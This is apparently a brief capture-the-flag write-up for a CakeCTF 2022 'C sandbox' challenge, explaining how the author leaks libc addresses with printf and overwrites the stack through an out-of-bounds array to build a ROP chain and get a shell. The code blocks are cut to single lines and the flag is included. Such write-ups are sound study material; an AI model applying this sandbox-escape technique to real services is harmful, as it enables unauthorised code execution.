0x0 Introduction
I designed a restricted C compiler! nc misc.2022.cakectf.com 10099
files: c_sandbox_c85cfad2fce8c0c6ac1dc144a1e4229c.tar.gz
0x1 Walk through
Basically, the server will compile a C program and execute it. But it only allows 4 function to be called.
sandbox.cpp
1 | /* Allow these function calls */ |
Our goal is to get shell with this restriction.
My first approach is using asm
in C code. However, the sandbox also detect it and prevent me from executing asm codes.
Then, I tried my second solution. constructing a rop chain.
Since we can use printf/puts in our code. We can simply print out the whole stack and find the libc address. Moreoever, The challenge also provide us a Dockerfile, so we can easily extract libc from it and get the libc functions offsets.
1 | printf( |
Modify the stack in C is very straighforward, just create a long array and modify the stack value using index.
1 | long x[1]; |
0x2 Solution
1 | long __libc_start_main_ret = 0x24083; |
0x3 Flag & Thoughts
It is actually more like a pwn problem.
CakeCTF{briI1ng_yoO0ur_oO0wn_gaA4dgeE3t!}